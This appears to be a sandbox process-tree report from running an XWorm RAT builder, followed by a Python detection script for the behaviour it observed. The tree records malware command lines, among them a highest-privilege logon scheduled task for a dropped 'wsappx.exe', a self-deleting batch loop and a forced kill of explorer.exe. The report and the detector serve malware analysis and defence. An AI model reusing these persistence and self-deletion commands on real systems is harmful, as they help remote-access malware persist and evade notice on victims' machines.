    cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    C:\Windows\system32\WerFault.exe  [PID 4604]
      cmdline: C:\Windows\system32\WerFault.exe -u -p 2736 -s 1584
      - Program crash

C:\Windows\System32\svchost.exe  [PID 1072]
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\spoolsv.exe  [PID 2072]

C:\Windows\System32\svchost.exe  [PID 1592]
  cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe  [PID 2000]
  cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe  [PID 1924]
  cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe  [PID 1912]
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe  [PID 1836]
  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
  C:\Windows\system32\AUDIODG.EXE  [PID 3136]
    cmdline: C:\Windows\system32\AUDIODG.EXE 0x2f8 0x2f4

C:\Windows\System32\svchost.exe  [PID 1808]
  cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe  [PID 1756]
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe  [PID 1716]
  cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe  [PID 2672]
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe  [PID 1372]
  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe  [PID 1648]
  cmdline: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe  [PID 3656]
  cmdline: C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe  [PID 4200]
  cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\System32\svchost.exe  [PID 1644]
  cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p

C:\Windows\system32\svchost.exe  [PID 1700]
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time

C:\Windows\system32\svchost.exe  [PID 1124]
  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\svchost.exe  [PID 4752]
  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe  [PID 1952]
  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\DllHost.exe  [PID 3576]
  cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  C:\Windows\system32\WerFault.exe  [PID 2756]
    cmdline: C:\Windows\system32\WerFault.exe -u -p 3576 -s 992
    - Program crash

C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 3172]
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com
  - Adds Run key to start application
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 3000]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe22319758,0x7ffe22319768,0x7ffe22319778
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 2544]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:2
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 4540]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 2772]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2216 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 1732]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2976 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 856]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2968 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 884]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3636 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 4828]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4648 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 4280]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3936 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 5000]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4916 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 4604]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 4968]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4876 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 1156]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5736 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 336]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5876 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 4808]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5976 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 4884]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 4532]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:8
  C:\Program Files\Google\Chrome\Application\chrome.exe  [PID 948]
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5220 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:1
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5132 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:12⤵PID:2856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:2920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2424 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3036 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:1956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6140 --field-trial-handle=1832,i,13986470051571676830,6581187266039512081,131072 /prefetch:82⤵PID:2724
-
-
PID 680 (depth 1) C:\Windows\system32\wbem\unsecapp.exe
    cmdline: C:\Windows\system32\wbem\unsecapp.exe -Embedding
PID 2800 (depth 1) C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
PID 2684 (depth 1) C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
PID 2664 (depth 1) C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
PID 2648 (depth 1) C:\Windows\sysmon.exe
    cmdline: C:\Windows\sysmon.exe
PID 2612 (depth 1) C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
PID 2432 (depth 1) C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
PID 2424 (depth 1) C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
PID 2228 (depth 1) C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
PID 2212 (depth 1) C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
PID 1672 (depth 1) C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
PID 1504 (depth 1) C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
PID 1488 (depth 1) C:\Windows\System32\svchost.exe
    cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
PID 1480 (depth 1) C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
PID 1460 (depth 1) C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  PID 4560 (depth 2) C:\Windows\system32\sihost.exe
      cmdline: sihost.exe
  PID 3092 (depth 2) C:\Windows\system32\sihost.exe
      cmdline: sihost.exe
  PID 4736 (depth 2) C:\Windows\system32\sihost.exe
      cmdline: sihost.exe
  PID 1712 (depth 2) C:\Windows\system32\sihost.exe
      cmdline: sihost.exe
  PID 1876 (depth 2) C:\Windows\system32\sihost.exe
      cmdline: sihost.exe
  PID 3288 (depth 2) C:\Windows\system32\sihost.exe
      cmdline: sihost.exe
PID 1348 (depth 1) C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
PID 896 (depth 1) C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
    cmdline: "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
PID 2744 (depth 1) C:\Windows\System32\rundll32.exe
    cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
PID 3724 (depth 1) C:\Users\Admin\Desktop\XWorm-RAT-V2.1-builder.exe
    cmdline: "C:\Users\Admin\Desktop\XWorm-RAT-V2.1-builder.exe"
  PID 1668 (depth 2) C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe"
      - Checks computer location settings
      - Executes dropped EXE
    PID 2388 (depth 3) C:\Windows\System32\schtasks.exe
        cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "wsappx" /tr "C:\Users\Static\wsappx.exe"
        - Creates scheduled task(s)
    PID 1824 (depth 3) C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpE238.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpE238.tmp.bat
      PID 4160 (depth 4) C:\Windows\system32\tasklist.exe
          cmdline: Tasklist /fi "PID eq 1668"
          - Enumerates processes with tasklist
      PID 2316 (depth 4) C:\Windows\system32\find.exe
          cmdline: find ":"
      PID 3412 (depth 4) C:\Windows\system32\timeout.exe
          cmdline: Timeout /T 1 /Nobreak
          - Delays execution with timeout.exe
      PID 2576 (depth 4) C:\Users\Static\wsappx.exe
          cmdline: "wsappx.exe"
          - Checks computer location settings
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
        PID 1108 (depth 5) C:\Windows\System32\schtasks.exe
            cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "wsappx" /tr "C:\Users\Static\wsappx.exe"
            - Creates scheduled task(s)
          PID 1824 (depth 6) C:\Windows\System32\Conhost.exe
              cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        PID 3388 (depth 5) C:\Windows\system32\WerFault.exe
            cmdline: C:\Windows\system32\WerFault.exe -u -p 2576 -s 2420
            - Program crash
  PID 4928 (depth 2) C:\Users\Admin\Desktop\builder.exe
      cmdline: "C:\Users\Admin\Desktop\builder.exe"
      - Executes dropped EXE
      - Checks processor information in registry
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of SendNotifyMessage
      - Suspicious use of SetWindowsHookEx
    PID 4424 (depth 3) C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qypivi1f\qypivi1f.cmdline"
      PID 4024 (depth 4) C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B37.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF87B34828AF45FD95422731E385FB80.TMP"
  PID 4560 (depth 2) C:\Windows\system32\WerFault.exe
      cmdline: C:\Windows\system32\WerFault.exe -u -p 3724 -s 2332
      - Program crash
PID 4720 (depth 1) C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
PID 5032 (depth 1) C:\Windows\system32\WerFault.exe
    cmdline: C:\Windows\system32\WerFault.exe -pss -s 404 -p 3724 -ip 3724
PID 2124 (depth 1) C:\Windows\system32\taskmgr.exe
    cmdline: "C:\Windows\system32\taskmgr.exe" /4
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SendNotifyMessage
PID 396 (depth 1) C:\Windows\system32\WerFault.exe
    cmdline: C:\Windows\system32\WerFault.exe -pss -s 484 -p 2576 -ip 2576
PID 492 (depth 1) C:\Windows\system32\svchost.exe
    cmdline: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
PID 5084 (depth 1) C:\Windows\system32\wbem\WmiApSrv.exe
    cmdline: C:\Windows\system32\wbem\WmiApSrv.exe
PID 1556 (depth 1) C:\Users\Admin\Desktop\builder.exe
    cmdline: "C:\Users\Admin\Desktop\builder.exe"
    - Executes dropped EXE
PID 1512 (depth 1) C:\Users\Admin\Desktop\XHVNC.exe
    cmdline: "C:\Users\Admin\Desktop\XHVNC.exe"
    - Loads dropped DLL
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
PID 3596 (depth 1) C:\Users\Admin\Desktop\XWorm.exe
    cmdline: "C:\Users\Admin\Desktop\XWorm.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Enumerates connected drives
  PID 4192 (depth 2) C:\Windows\SYSTEM32\taskkill.exe
      cmdline: taskkill /F /IM explorer.exe
      - Kills process with taskkill
  PID 2920 (depth 2) C:\Windows\explorer.exe
      cmdline: "C:\Windows\explorer.exe"
      - Modifies Installed Components in the registry
      - Enumerates connected drives
      - Checks SCSI registry key(s)
      - Modifies Internet Explorer settings
      - Modifies registry class
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious use of SetWindowsHookEx
    PID 3408 (depth 3) C:\Windows\system32\WerFault.exe
        cmdline: C:\Windows\system32\WerFault.exe -u -p 2920 -s 7812
        - Program crash
  PID 4040 (depth 2) C:\Windows\explorer.exe
      cmdline: "C:\Windows\explorer.exe"
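The two sequences recorded above are the ones worth alerting on: under win-xworm-builder.exe, a scheduled task created with /sc ONLOGON /RL HIGHEST whose action is a dropped copy in a user-writable folder (C:\Users\Static\wsappx.exe), plus a self-deleting tmp*.bat that polls tasklist for its parent's PID (1668) and sleeps with timeout before launching that copy; under XWorm.exe, taskkill /F /IM explorer.exe followed by a fresh explorer.exe. The script below is an added detection example written for this page, not sandbox output or XWorm code. Its input is a constructed list of process-creation records shaped after the tree above (PIDs are the report's, parent PIDs follow the nesting, two benign controls are added for contrast); the rule names and the list of trusted install roots are assumptions to be tuned per environment.

```python
import re

# Constructed process-creation records (pid, ppid, image, command line) shaped
# after the sandbox tree above. PIDs are the report's; parent PIDs follow the
# tree nesting; the last two records are benign controls added for contrast.
EVENTS = [
    (1668, 3724, r"C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe"'),
    (2388, 1668, r"C:\Windows\System32\schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST '
     r'/tn "wsappx" /tr "C:\Users\Static\wsappx.exe"'),
    (1824, 1668, r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpE238.tmp.bat '
     r'& Del C:\Users\Admin\AppData\Local\Temp\tmpE238.tmp.bat'),
    (4160, 1824, r"C:\Windows\system32\tasklist.exe", r'Tasklist /fi "PID eq 1668"'),
    (2316, 1824, r"C:\Windows\system32\find.exe", r'find ":"'),
    (3412, 1824, r"C:\Windows\system32\timeout.exe", r"Timeout /T 1 /Nobreak"),
    (2576, 1824, r"C:\Users\Static\wsappx.exe", r'"wsappx.exe"'),
    (4192, 3596, r"C:\Windows\SYSTEM32\taskkill.exe", r"taskkill /F /IM explorer.exe"),
    (900, 700, r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /sc DAILY /tn "Backup" /tr "C:\Program Files\Backup\run.exe"'),
    (901, 700, r"C:\Windows\System32\cmd.exe", r"cmd /C C:\Tools\build.bat"),
]

# Roots under which a scheduled-task action may legitimately live
# (assumption for this example; tune per environment).
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

SELF_DELETING_BAT = re.compile(r"/c\s+(\S+\.bat)\s*&\s*del\s+\1(?:\s|$)", re.I)
TASK_TARGET = re.compile(r'/tr\s+("[^"]+"|\S+)', re.I)


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def user_writable(path):
    return not path.strip('"').lower().startswith(TRUSTED_ROOTS)


def detect(events):
    """Return (pid, rule, evidence) tuples for the XWorm-style patterns."""
    children = {}
    for pid, ppid, image, cmd in events:
        children.setdefault(ppid, []).append((pid, image, cmd))
    findings = []
    for pid, ppid, image, cmd in events:
        name, low = basename(image), cmd.lower()
        # 1. Logon task at the highest run level whose action is a user-writable path.
        if name == "schtasks.exe" and "/create" in low and "/sc onlogon" in low and "/rl highest" in low:
            m = TASK_TARGET.search(cmd)
            if m and user_writable(m.group(1)):
                findings.append((pid, "schtasks_onlogon_highest_userpath", m.group(1).strip('"')))
        # 2. cmd /C <tmp>.bat & Del <same .bat>: a batch file that erases itself.
        if name == "cmd.exe":
            m = SELF_DELETING_BAT.search(cmd)
            if m:
                findings.append((pid, "self_deleting_batch", m.group(1)))
                kids = {basename(i): (p, c) for p, i, c in children.get(pid, [])}
                # 3. The batch polls tasklist for a PID and sleeps with timeout:
                #    it is waiting for the dropper to exit before starting the copy.
                if "tasklist.exe" in kids and "timeout.exe" in kids \
                        and re.search(r"pid eq \d+", kids["tasklist.exe"][1], re.I):
                    findings.append((pid, "parent_exit_wait_loop", kids["tasklist.exe"][1]))
                # 4. Anything the batch launches from a user-writable location.
                for kid_pid, kid_image, _ in children.get(pid, []):
                    if user_writable(kid_image):
                        findings.append((kid_pid, "payload_launched_from_batch", kid_image))
        # 5. Forced kill of the shell, as XWorm.exe did before respawning explorer.exe.
        if name == "taskkill.exe" and "/f" in low.split() and re.search(r"/im\s+explorer\.exe", low):
            findings.append((pid, "explorer_kill", cmd))
    return findings


if __name__ == "__main__":
    for pid, rule, evidence in detect(EVENTS):
        print(f"PID {pid:<5} {rule:<34} {evidence}")
```

Rules 2 and 3 are deliberately joined: a self-deleting batch on its own is common in installers, but one whose children are tasklist /fi "PID eq N" plus timeout is the wait-for-parent loop that .NET RATs use to swap in the persisted copy. Rule 1 keys on the task action's location rather than the task name, since "wsappx" is chosen to blend in with a real Windows service name. The benign controls (PIDs 900 and 901) produce no findings.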
PID 2840 (depth 1) C:\Windows\system32\taskmgr.exe
    cmdline: "C:\Windows\system32\taskmgr.exe" /4
    - Checks SCSI registry key(s)
    - Checks processor information in registry
PID 3564 (depth 1) C:\Windows\System32\rundll32.exe
    cmdline: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
PID 3848 (depth 1) C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  PID 2656 (depth 2) C:\Windows\system32\WerFault.exe
      cmdline: C:\Windows\system32\WerFault.exe -u -p 3848 -s 4116
      - Program crash
PID 2796 (depth 1) C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    - Suspicious use of SetWindowsHookEx
PID 2288 (depth 1) C:\Windows\system32\WerFault.exe
    cmdline: C:\Windows\system32\WerFault.exe -pss -s 464 -p 2920 -ip 2920
PID 3640 (depth 1) C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    - Suspicious use of SetWindowsHookEx
PID 3292 (depth 1) C:\Windows\system32\WerFault.exe
    cmdline: C:\Windows\system32\WerFault.exe -pss -s 184 -p 3848 -ip 3848
PID 2100 (depth 1) C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
  PID 4732 (depth 2) C:\Windows\system32\WerFault.exe
      cmdline: C:\Windows\system32\WerFault.exe -u -p 2100 -s 3548
      - Program crash
PID 3500 (depth 1) C:\Windows\system32\WerFault.exe
    cmdline: C:\Windows\system32\WerFault.exe -pss -s 536 -p 2100 -ip 2100
PID 3596 (depth 1) C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
